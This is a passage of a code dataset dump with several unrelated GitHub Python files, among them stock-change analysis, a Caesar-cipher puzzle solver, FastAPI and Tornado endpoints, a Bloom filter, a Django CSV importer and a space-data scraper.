curt_dict[curt_start] == cor_dict[curt_start]:\n cor_count += 1\n\n return cor_count,prec_length,recall_length\n\nif __name__ == '__main__':\n sentences = read_sogou_report()\n file = open('corpus/sougou.txt', 'w', encoding='utf-8')\n print(len(sentences))\n content = ''.join(sentences)\n content = re.sub('[\\0]', '', content)\n file.write(content)\n file.close()\n","repo_name":"supercoderhawk/DNN_CWS","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"54"} +{"seq_id":"31243436728","text":"import yfinance as yf\nimport pandas as pd\n\n\ndef max_daily_change(indices, intrvl='1d', quantity=0, add_ns=1):\n def ns(x):\n return x+'.NS'\n if add_ns == 0:\n df = yf.download(tickers=indices, period='1d', interval=intrvl)\n else:\n df = yf.download(tickers=list(map(ns, indices)),\n period='1d', interval=intrvl)\n df = df.dropna()\n df = df.iloc[-1]\n df = pd.DataFrame(df[[\"Open\", \"High\", \"Low\", \"Close\"]])\n df = df.round(decimals=2)\n\n # print(df.index)\n df = df.T\n arr = []\n for i in df['Open']:\n arr.append(i)\n df2 = pd.DataFrame(arr, columns=['Name'])\n df2.set_index('Name', inplace=True)\n # print(df2)\n arr = []\n for i in df.iloc[-1]['Open']:\n arr.append(i)\n df2['Open'] = arr\n arr = []\n for i in df.iloc[-1]['High']:\n arr.append(i)\n df2['High'] = arr\n arr = []\n for i in df.iloc[-1]['Low']:\n arr.append(i)\n df2['Low'] = arr\n arr = []\n for i in df.iloc[-1]['Close']:\n arr.append(i)\n df2['Close'] = arr\n\n temp = (df2['High'] + df2['Low'])/2\n df2['Average'] = temp\n\n #temp = ((df2['High'] - df2['Low'])*100) / df2['Average']\n temp = ((abs(df2['Close'] - df2['Open']))*100) / df2['Open']\n df2['Change%'] = temp\n\n temp = (df2['Close']-df2['Open'])\n df2['Diff'] = temp\n\n final_df = pd.DataFrame(df2.sort_values(\n by=['Change%'], ascending=False))\n\n print(final_df)\n # if add_ns == 0:\n final_df = final_df[['Change%']]\n\n idx = list(final_df.index)\n for i in range(len(idx)):\n try:\n idx[i] = idx[i].replace('&', '_')\n except:\n pass\n\n try:\n idx[i] = idx[i].replace('.NS', '')\n while(len(idx[i]) != 20):\n idx[i] += '_'\n\n except:\n pass\n\n final_df.index = idx\n if quantity != 0:\n final_df = final_df.head(quantity)\n\n upload_lst = ''\n for i in final_df.index:\n if '_' in i:\n j = i.replace('_', '')\n j += ','\n upload_lst += j\n\n f = open(\"/Users/amlanpatra/Desktop/stk/change.txt\", \"w\")\n f.write(upload_lst)\n f.close()\n\n return final_df\n","repo_name":"amlanpatra/daily_stock","sub_path":"daily_change.py","file_name":"daily_change.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9704353997","text":"#https://www.codewars.com//kata/598e045b8c13926d8c0000e8\ndef break_caesar(message):\n alphabet = [char for char in \"abcdefghijklmnopqrstuvwxyz\"]\n hits = {} \n for x in range(len(alphabet)): \n newmsg = \"\"\n for y in range(len(message)):\n if message[y].isalpha():\n charToAdd = alphabet[(alphabet.index(message[y].lower())+x)%26] \n newmsg = newmsg + charToAdd\n elif message[y]==' ': \n charToAdd = message[y]\n newmsg = newmsg + charToAdd \n splitTrash = newmsg.split() \n numHits = 0\n for w in splitTrash:\n if w in WORDS:\n numHits+=1 \n hits[numHits]=x \n greatest = 0 \n for h in hits.keys():\n if h > greatest:\n greatest = h\n if hits[greatest] == 0: \n return 0\n else:\n return 26 - hits[greatest]\n","repo_name":"Kerbel-A/UIRS","sub_path":"5kyu/Break the Caesar!.py","file_name":"Break the Caesar!.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73168511202","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom LIB.data_conn import *\r\nfrom LIB.questionWidget import *\r\nfrom LIB.navbar import *\r\n\r\nclass EditTest(ttk.LabelFrame):\r\n \"\"\"A class to create frame objects used in an App\"\"\"\r\n def __init__(self, window, title):\r\n super().__init__(window)\r\n self.window = window\r\n self.title = title\r\n self['text'] = self.title\r\n gridOptions = {'padx':5, 'pady':5, 'sticky':tk.NSEW}\r\n self.grid(row = 0, column = 0, **gridOptions)\r\n #Create an instance of the nav bar\r\n self.navigation = NavBar(self.window, self)\r\n self.itemFrame = ttk.Frame(self)\r\n self.itemFrame.grid(row=1, column=1,sticky=tk.NSEW, pady=5, padx=5)\r\n self.DBconn = Database(\"AM.db\")\r\n\r\n\r\n def populate(self, data, fields):\r\n self.data = data\r\n r, c=0,0\r\n for i in range(0, len(fields)):\r\n self.label = ttk.Label(self.itemFrame, text = fields[i])\r\n self.label.grid(row =r, column=c,padx=5, pady=5, sticky=tk.W)\r\n self.entryVar = tk.StringVar()\r\n self.entry = ttk.Entry(self.itemFrame)\r\n self.entry.insert(0,data[i])\r\n self.entry.grid(row=r, column=c+1, padx=5, pady=5, sticky=tk.W)\r\n r+=1\r\n self.addLabel = ttk.Label(self.itemFrame, text =\"Add Questions:\")\r\n self.addLabel.grid(row= r, column = c, pady=5, padx=5, sticky=tk.W)\r\n #Add questions option menu\r\n self.optionVar = tk.StringVar()\r\n self.questions = self.DBconn.getNewQuestions(data[4])\r\n self.addMenu = tk.OptionMenu(self.itemFrame, self.optionVar,self.questions[0], *self.questions)\r\n self.addMenu.configure(width=15)\r\n self.addMenu.grid(row = r, column = c+1, pady=5, padx=5, sticky=tk.W)\r\n #Add button\r\n self.addButton= ttk.Button(self.itemFrame, text = \"+\", command = self.addQuestions, width=5)\r\n self.addButton.grid(row = r, column=2, padx=5, pady=5, sticky=tk.W)\r\n\r\n self.questAns = self.DBconn.getQuestionAnswer(data[0])\r\n self.questionsFrame = ttk.LabelFrame(self.itemFrame, text=\"Questions in Test\")\r\n self.questionsFrame.grid(row=0, column=3, pady=5,padx=5, sticky=tk.NSEW, rowspan=10)\r\n self.q_row, self.q_col = 0, 0\r\n for q in self.questAns:\r\n Question(self.questionsFrame,q[0], q[1],q[2],self.q_row, self.q_col)\r\n self.q_row+=1\r\n\r\n def addQuestions(self):\r\n q = self.optionVar.get().strip(\"\"\" ,()'\"\"\" ).strip(\"'\")\r\n new_q = q.split(\",\")\r\n Question(self.questionsFrame, new_q[0], new_q[1], new_q[2],self.q_row, self.q_col)\r\n self.q_row+=1\r\n #Make saves to DB\r\n self.DBconn.addData(\"test_parts\", (self.data[0], new_q[0]))\r\n\r\n def goBack(self):\r\n #clear the holding fraem\r\n question_wids=self.itemFrame.winfo_children()\r\n for q in question_wids:\r\n q.destroy()\r\n self.window.show_frame(1)\r\n\r\n","repo_name":"oreange/schoolsystem","sub_path":"editTest.py","file_name":"editTest.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5613192048","text":"# 咕噜咕噜的丁丁\n# 不浪费一分一秒\n# 你可以的\n# 时间:2021/9/16 16:29\ndef fib(n):\n if n==1:\n return 1\n elif n==2:\n return 1\n else:\n return fib(n-1)+fib(n-2)\n\n#斐波那契数列第6位上的数字\nprint(fib(6))\n\nprint('----------')\n# 输出这个数列前6位上的数字\nfor i in range(1,7):\n print(fib(i))","repo_name":"cc852852/vippython","sub_path":"chap10/demo11.py","file_name":"demo11.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26334864614","text":"import subprocess as sp\r\nimport csv\r\nimport para_best as para\r\nfilename=\"result.csv\"\r\nbestfile=\"Final_DATA.csv\"\r\nsr=\"/\"\r\ncha=\"change\"\r\nsave=\"save\"\r\nevalue = 0\r\nenumber = 0\r\n#dataparamater\r\nimprovedirectory=\"improve\"\r\ndefocus_chr = \"defocus\"\r\nntfftx_chr = \"ntfftx\"\r\nntffty_chr = \"ntffty\"\r\nbion_focus_chr = \"bion_focus\"\r\nimproveth_plus_chr = \"improveth_plus\"\r\nimproveth_minus_chr = \"improveth_minus\"\r\nimprovefeedback_plus_chr = \"improvefeedback_plus\"\r\nimprovefeedback_minus_chr = \"improvefeedback_minus\"\r\nspacedensity_chr = \"spacedensity\"\r\nintparamater_chr = \"intparamater\"\r\nphasereverseparamater_chr = \"phasereverseparamater\"\r\nduplicateparamater_chr = \"duplicateparamater\"\r\nfield_chr = \"field\"\r\ndigt_EMT_phase_chr = \"digt_EMT_phase\"\r\ndigt_EMT_intensity_chr = \"digt_EMT_intensity\"\r\nimproveparamater_chr = \"improveparamater\"\r\n\r\ndef setdat_chr(a1,a2):\r\n with open(a1) as f:\r\n lines = f.readlines()\r\n lines_strip = [line.strip() for line in lines]\r\n xxx = [line for line in lines_strip if a2 in line]\r\n return xxx[0]\r\ndef setdat(a1,a2,a3):\r\n with open(a1) as f:\r\n lines = f.readlines()\r\n lines_strip = [line.strip() for line in lines]\r\n xxx = [line for line in lines_strip if a2 in line]\r\n yyy = xxx[0].split(' ')\r\n return yyy[a3]\r\n\r\npluslist = setdat_chr(cha,improvefeedback_plus_chr).split()\r\nminuslist = setdat_chr(cha,improvefeedback_minus_chr).split()\r\n\r\nnplist=[]\r\nnp_plus_list=[]\r\nnp_minus_list=[]\r\nevalist=[]\r\neva_plus_list=[]\r\neva_minus_list=[]\r\nnumber_cont = []\r\n\r\n######\r\n\r\n########\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n for k in range(2,para.improveparamater+1):\r\n# paradata = pd.read_csv(filename)\r\n# print(paradata)\r\n\r\n #operationfile = filename\r\n # import numpy as np\r\n cont=[]\r\n try:\r\n operationfile = para.current+sr+improvedirectory+sr+str(i)+sr+\\\r\n str(j)+sr+save+str(k)+sr+filename\r\n with open(operationfile)as f:\r\n for row in csv.reader(f):\r\n arr=row\r\n cont.append(arr)\r\n except FileNotFoundError :\r\n continue\r\n number_single=\"{0}_{1}_{2}\".format(str(i),str(j),str(k))\r\n number_cont.append(number_single)\r\n npsingle=int(float(cont[3][0]))\r\n np_plus_single=int(float(cont[3][1]))\r\n np_minus_single=int(float(cont[3][2]))\r\n evasingle=float(cont[5][0])\r\n eva_plus_single=float(cont[5][1])\r\n eva_minus_single=float(cont[5][2])\r\n nplist.append(npsingle)\r\n np_plus_list.append(np_plus_single)\r\n np_minus_list.append(np_minus_single)\r\n evalist.append(evasingle)\r\n eva_plus_list.append(eva_plus_single)\r\n eva_minus_list.append(eva_minus_single)\r\n print(i,j,k)\r\n\r\n#sort\r\nsort_nplist = sorted(nplist)\r\nsort_np_plus_list = sorted(np_plus_list)\r\nsort_np_minus_list = sorted(np_minus_list)\r\nsort_evalist = sorted(evalist)\r\nsort_eva_plus_list = sorted(eva_plus_list)\r\nsort_eva_minus_list = sorted(eva_minus_list)\r\n\r\ndef get_duplicate_list(seq):\r\n seen = []\r\n return [x for x in seq if not seen.append(x) and seen.count(x) == 1]\r\n\r\nfor i in range(1,2):\r\n for j in range(1,2):\r\n for k in range(1,2):\r\n# paradata = pd.read_csv(filename)\r\n# print(paradata)\r\n\r\n operationfile = para.current+sr+improvedirectory+sr+str(i)+sr+\\\r\n str(j)+sr+save+str(k)+sr+filename\r\n #operationfile = filename\r\n # import numpy as np\r\n cont=[]\r\n with open(operationfile)as f:\r\n for row in csv.reader(f):\r\n arr=row\r\n cont.append(arr) \r\n number_single=\"FIRST_{0}_{1}_{2}\".format(str(i),str(j),str(k))\r\n npsingle=int(float(cont[3][0]))\r\n np_plus_single=int(float(cont[3][1]))\r\n np_minus_single=int(float(cont[3][2]))\r\n evasingle=float(cont[5][0])\r\n eva_plus_single=float(cont[5][1])\r\n eva_minus_single=float(cont[5][2])\r\n # nplist.append(npsingle)\r\n # np_plus_list.append(np_plus_single)\r\n # np_minus_list.append(np_minus_single)\r\n # evalist.append(evasingle)\r\n # eva_plus_list.append(eva_plus_single)\r\n # eva_minus_list.append(eva_minus_single)\r\n\r\n\r\nfinalplace=para.current+sr+bestfile\r\nf = open(finalplace,'w')\r\nempty=[]\r\nf.write(\"npnumber,{}\\n\".format(npsingle))\r\nfor i in range(len(sort_nplist)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(nplist) if x ==sort_nplist[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_nplist[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"npnumber_plus,{}\\n\".format(np_plus_single))\r\nfor i in range(len(sort_np_plus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(np_plus_list) if x ==sort_np_plus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_np_plus_list[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"npnumber_minus,{}\\n\".format(np_minus_single))\r\nfor i in range(len(sort_np_minus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(np_minus_list) if x ==sort_np_minus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_np_minus_list[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"evaluation,{}\\n\".format(evasingle))\r\nfor i in range(len(sort_evalist)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(evalist) if x ==sort_evalist[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_evalist[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"evaluation_plus,{}\\n\".format(eva_plus_single))\r\nfor i in range(len(sort_eva_plus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(eva_plus_list) if x ==sort_eva_plus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_eva_plus_list[i])))\r\nf.write(\"\\n\")\r\nempty=[]\r\nf.write(\"evaluation_minus,{}\\n\".format(eva_minus_single))\r\nfor i in range(len(sort_eva_minus_list)):\r\n seen = []\r\n empty = empty +[[j for j, x in enumerate(eva_minus_list) if x ==sort_eva_minus_list[i] \\\r\n and not seen.append(x) and not seen.count(x) ==0]]\r\nreadylist=get_duplicate_list(empty)\r\nfor i in range(len(readylist)):\r\n if len(readylist[i]) !=1:\r\n for j in range(len(readylist[i])):\r\n f.write(\"{0},\".format(number_cont[readylist[i][j]]))\r\n if len(readylist[i]) ==1:\r\n f.write(\"{0},\".format(number_cont[readylist[i][0]]))\r\nf.write(\"\\n\")\r\nfor i in range(len(number_cont)):\r\n f.write(\"{0},\".format(str(sort_eva_minus_list[i])))\r\nf.write(\"\\n\")\r\nf.write(\"\\n\")\r\nf.write(\"FILE_NAME,\")\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n f.write(\"{0}_{1},\".format(str(i),str(j)))\r\nf.write(\"\\n\")\r\nf.write(\"fb_plus,\")\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n f.write(\"{0},\".format(str(pluslist[i])))\r\nf.write(\"\\n\")\r\nf.write(\"fb_minus,\")\r\nfor i in range(1,len(pluslist)):\r\n for j in range(1,len(minuslist)):\r\n f.write(\"{0},\".format(str(minuslist[j]))) \r\nf.write(\"\\n\")\r\nf.write(\"spacedensity,{}\".format(str(para.spacedensity)))\r\nf.write(\"\\n\")\r\nf.write(\"intparamater,{}\".format(str(para.intparamater)))\r\nf.write(\"\\n\")\r\nf.write(\"phasereverseparamater,{}\".format(str(para.phasereverseparamater)))\r\nf.write(\"\\n\")\r\nf.write(\"duplicateparamater,{}\".format(str(para.duplicateparamater)))\r\nf.write(\"\\n\")\r\nf.write(\"digt_EMT_phase,{}\".format(str(para.digt_EMT_phase)))\r\nf.write(\"\\n\")\r\nf.write(\"digt_EMT_intensity,{}\".format(str(para.digt_EMT_intensity)))\r\nf.write(\"\\n\")\r\nf.write(\"digialnumber,{}\".format(para.digtalnumber))\r\nf.write(\"\\n\")\r\nf.write(\"improveth_plus,{}\".format(str(para.improveth_plus)))\r\nf.write(\"\\n\")\r\nf.write(\"improveth_minus,{}\".format(str(para.improveth_minus)))\r\nf.write(\"\\n\")\r\nf.write(\"improveparamater,{}\".format(str(para.improveparamater)))\r\nf.close()\r\n","repo_name":"Tomoaki-5/resolution","sub_path":"best_directory.py","file_name":"best_directory.py","file_ext":"py","file_size_in_byte":10014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42599228694","text":"from fastapi import APIRouter, status, HTTPException, Depends, Response\n\nfrom sqlalchemy.future import select\nfrom sqlalchemy import insert\n\nfrom database.db import Database\nfrom routes.schemas import Floor\n\ndb = Database()\n\nrouter = APIRouter(\n prefix=\"/floor\",\n tags=[\"Floor\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.get('/all', tags=[\"Get all floors\"])\nasync def get_all_floors(response: Response):\n await db.connect()\n query = select(db.floors)\n result = await db.db.fetch_all(query)\n if result is None:\n raise HTTPException(status_code=404, detail=\"No floors found\")\n await db.disconnect()\n response.status_code = status.HTTP_200_OK\n return result\n\n\n@router.post('/add', tags=[\"Add floor\"])\nasync def add_floor(floor: Floor, response: Response):\n await db.connect()\n query = insert(db.floors).values(name=floor.name)\n await db.db.execute(query)\n await db.disconnect()\n response.status_code = status.HTTP_200_OK\n return {\"message\": \"Floor added successfully\"}\n\n\n@router.get('/all/deep', tags=[\"Get all floors with cameras\"])\nasync def get_all_floors_deep(response: Response):\n await db.connect()\n query = select(db.floors)\n dat = {}\n result = await db.db.fetch_all(query)\n if result is None:\n raise HTTPException(status_code=404, detail=\"No floors found\")\n for floor in result:\n query = select(db.cameras).where(db.cameras.c.floor_id == floor['id'])\n camera = await db.db.fetch_all(query)\n dat[floor['name']] = camera\n\n await db.disconnect()\n response.status_code = status.HTTP_200_OK\n return dat\n","repo_name":"ahmadbinshafiq/fastapi-boilercode","sub_path":"routes/floors.py","file_name":"floors.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19133449467","text":"\"\"\"\nModule contains the api controllers\n\"\"\"\nimport json\n\nfrom tornado.web import RequestHandler # pylint: disable=import-error\n\nfrom config import API_VERSION\nfrom config import LOGGER\nfrom eyegaze_prediction.api.dms.dms.get_eyegaze import predict_eyegaze\nfrom eyegaze_prediction.business_exception import BusinessException # pylint: disable=unused-import\nfrom eyegaze_prediction.business_exception import custom_except\n\n\nclass HealthCheck(RequestHandler): # pylint: disable=too-few-public-methods\n \"\"\"\n A class to handle health check endpoint requests\n \"\"\"\n\n def get(self):\n \"\"\"\n A function to handle GET requests for HealthCheck Endpoint\n Returns:\n\n \"\"\"\n result = custom_except(\"Could not process request\", \"Error\")\n try:\n result = {\"status_code\": 200, \"message\": \"Server Up\"}\n result[\"api_version\"] = API_VERSION\n self.set_status(200, \"Server Up\")\n except Exception as e: # pylint: disable=broad-except\n LOGGER.error(e.__str__())\n result[\"error\"] = e.__str__()\n self.set_status(500, \"Server Down\")\n self.write(json.dumps(result))\n\n\nclass EyegazePredictor(RequestHandler): # pylint: disable=too-few-public-methods\n \"\"\"\n Predictor class to output headgaze direction predictions and out of screen estimate\n \"\"\"\n\n def post(self):\n \"\"\"\n API which processes one image at a time for headgaze prediction.\n :return:\n \"\"\"\n response = custom_except(\"Could not fetch off-screen gaze predictions\", status_code=500)\n try:\n data = json.loads(self.request.body.decode(\"utf-8\"))\n # LOGGER.info(data)\n user_id = data.get(\"user_id\")\n file_path = data.get(\"file_path\")\n count = data.get(\"count\")\n\n if type(file_path) in [str, int, float]:\n LOGGER.exception(TypeError)\n response = custom_except(\"Invalid input format! Input list of file paths\", 400)\n self.set_status(400)\n elif file_path is None:\n response = custom_except(\"File path list missing\", 400)\n self.set_status(400)\n elif len(file_path) == 0:\n response = custom_except(\"File path list empty\", 404)\n self.set_status(404)\n else:\n # predict off screen gaze\n pred_batch = predict_eyegaze(file_path)\n LOGGER.info(pred_batch)\n\n response[\"data\"] = pred_batch\n response[\"status_code\"] = 200\n response[\"message\"] = \"Successfully fetched off-screen gaze predictions\"\n response[\"attributes\"] = {\n \"user_id\": user_id,\n \"file_path\": file_path,\n \"count\": count,\n }\n response[\"api_version\"] = API_VERSION\n except BusinessException as e: # pylint: disable=broad-except\n LOGGER.error(e.__str__())\n response['error'] = e.__str__()\n self.set_status(500)\n except Exception as e: # pylint: disable=broad-except\n LOGGER.error(e.__str__())\n response['error'] = e.__str__()\n self.set_status(500)\n\n self.write(json.dumps(response))\n","repo_name":"himanshu-doi/eyegaze-prediction-api","sub_path":"eyegaze_prediction/api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9767278476","text":"# pip install bitarray\nimport hashlib\n\n# ブルームフィルター\nclass bfindex:\n # 初期化\n def __init__(self, m=64, k=3):\n # ビット長の長さ\n self.m = m\n # 登録するインデックス数\n self.k = k\n # いくつ登録したかを保存\n self.count = 0\n # ビット列\n self.bit = 0b0\n\n # キーワードの追加\n def add(self, key):\n # k以上登録しないようにする\n if self.count < self.k:\n # ハッシュを求め、ビット列に登録\n self._set(self._hash(key))\n # 登録した数\n self.count += 1\n\n # ビット列の中に登録されているかどうか\n def check(self, key):\n # keyからハッシュ値を求める\n value = self._hash(key)\n # 保存されているビット列とkeyのハッシュが存在するかを求める\n for v, b in zip(bin(value)[2:], bin(self.bit)[2:]):\n # keyが1の場合に登録されているビット列も1なのかどうかを確認\n # 違ったら登録されていない。なので、Falseを返す\n if v == '1' and v != b:\n return False\n else:\n # 最後までループが回ったら、二つのビット形式を表示して、Trueを返す\n print(bin(self.bit)[2:], bin(value)[2:])\n return True\n\n # ビット列の加算(OR)\n def _set(self, value):\n self.bit |= value\n\n # ハッシュ値の計算\n def _hash(self, key):\n # sha256でハッシュを求め、10進数に変換し2進数に変換する。\n # その後、m個分のビット列を返す\n value = int(bin(int(hashlib.sha256(key.encode('utf-8')).hexdigest(), 16))[:self.m + 2], 2)\n return value\n\n\n# 実行テスト\nif __name__ == \"__main__\":\n b = bfindex(m=254)\n # b.add('start')\n # b.add('stop')\n # b.add('ky')\n # print(bin(b.bit))\n b.add('gagasg')\n b.add('babasa')\n b.add('basag3e4')\n print(bin(b.bit))\n\n\n # b.add('aba3a')\n # b.add('asdba')\n # b.add('hwer')\n # print(bin(b.bit))\n\n # b.add('starhshfsdht')\n # b.add('j6jrdjhdf')\n # b.add('uytkuytr')\n # print(bin(b.bit))\n\n\n print(b.check('start'))\n print(b.check('kaishi'))\n print(b.check('stop'))\n print(b.check('ky'))\n print(b.check('kasy'))\n print(b.check('baka'))","repo_name":"assen0817/bfindex","sub_path":"BloomFilte.py","file_name":"BloomFilte.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12958255882","text":"#needs to be updated and an example needs to be written\nfrom astropy.io import fits\nimport numpy as np\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport requests\nimport re\nimport glob\nimport datetime\nimport time\nimport random\nimport os\nimport utils\nimport re\nimport pandas as pd\n\ninstr = 'swea'\nprojectPath = utils.getBasePath()\ninstrPath = projectPath + '/Data/maven/data/sci/%s/'%instr[:3]\ndef getDataLinks(dataCls='svy_3d'):\n def loadDf():\n dF = pd.read_csv(writePath1 + 'paths.csv',names=['Date','Download_Url'])\n dF = dF.set_index('Date')\n dF.index = pd.to_datetime(dF.index,format='%Y%m%d')\n return dF\n \n baseUrl = 'https://pds-ppi.igpp.ucla.edu/search/view/?f=yes&id=pds://PPI/maven.%s.calibrated/data/'%instr\n dwUrl = 'https://pds-ppi.igpp.ucla.edu/ditdos/download?id=pds://PPI/maven.%s.calibrated/data/'%instr\n dataPath = '../Data/'\n writePath1 = dataPath + '%s/'%instr + '%s/'%dataCls \n \n if not os.path.exists(writePath1 + 'paths.csv'):\n if not os.path.exists(writePath1):\n os.makedirs(writePath1)\n dataCls += '/'\n urlPref = baseUrl + dataCls \n req = Request(urlPref)\n html_page = urlopen(req)\n soup = BeautifulSoup(html_page, \"lxml\")\n yrLinks = [re.search(r'[2]\\d{3}$',item.get('href')).group(0) for item in soup.findAll('a') if re.search(r'[2]\\d{3}$',item.get('href'))]\n yrLinks = list(set(yrLinks))\n print(yrLinks)\n for yr in yrLinks:\n print(dataCls,yr)\n yrUrl = baseUrl + dataCls + yr \n req = Request(yrUrl)\n html_page = urlopen(req)\n soup = BeautifulSoup(html_page, \"lxml\")\n mtLinks = [re.search(r'[2]\\d{3}/\\d{2}$',item.get('href')).group(0).split('/')[-1] for item in soup.findAll('a') if re.search(r'[2]\\d{3}/\\d{2}$',item.get('href'))]\n mtLinks = list(set(mtLinks))\n mtLinks = ['/'+x for x in mtLinks]\n for mt in mtLinks:\n mtUrl = baseUrl + dataCls + yr + mt\n req = Request(mtUrl)\n html_page = urlopen(req)\n soup = BeautifulSoup(html_page, \"lxml\")\n fdLinks = [item.get('href').split('/')[-1] for item in soup.findAll('a') if re.search(r'&o=1\\b',item.get('href'))]\n fdLinks = list(set(fdLinks))\n dwLinks = [dwUrl+dataCls+yr+mt+'/'+x[:-4]+'.cdf' for x in fdLinks]\n for dwLink in dwLinks:\n dateS = dwLink.split('_')[-3]\n with open(writePath1 + 'paths.csv','a') as fl:\n fl.write('%s,%s\\n'%(dateS,dwLink))\n return loadDf()\n\n\n","repo_name":"PoliteCat420/mars-utils","sub_path":"swea.py","file_name":"swea.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28526932158","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.shortcuts import render\n\nfrom django import forms\n\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom .models import Player\n\n\nclass CsvImportForm(forms.Form):\n csv_upload = forms.FileField()\n\nclass PlayerAdmin(admin.ModelAdmin):\n list_display = ('name', 'club', 'nationality', 'age')\n\n def get_urls(self):\n urls = super().get_urls()\n new_urls = [path('upload-csv/', self.upload_csv),]\n return new_urls + urls\n\n def upload_csv(self, request):\n\n if request.method == \"POST\":\n csv_file = request.FILES[\"csv_upload\"]\n \n if not csv_file.name.endswith('.csv'):\n messages.warning(request, 'The wrong file type was uploaded')\n return HttpResponseRedirect(request.path_info)\n \n file_data = csv_file.read().decode(\"ISO-8859-1\")\n csv_data = file_data.split(\"\\n\")\n \n\n for x in csv_data[1:]:\n if x == '':\n continue\n fields = x.split(\",\")\n \n created = Player.objects.update_or_create(\n name = fields[0],\n club = fields[1],\n nationality = fields[2],\n position = fields[3],\n age = fields[4],\n matches = fields[5],\n )\n \n url = reverse('admin:index')\n return HttpResponseRedirect(url)\n\n form = CsvImportForm()\n data = {\"form\": form}\n return render(request, \"admin/csv_upload.html\", data)\n\nadmin.site.register(Player, PlayerAdmin)","repo_name":"AmirJlr/django-csv","sub_path":"upload/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39745840782","text":"from turtle import position\r\nfrom ursina import *\r\nfrom ursina.prefabs.first_person_controller import FirstPersonController\r\n\r\napp = Ursina()\r\napp.setBackgroundColor(0, 0, 0)\r\nwindow.title = 'On the Eart | Planetarium'\r\nwindow.borderless = False\r\nwindow.fullscreen = 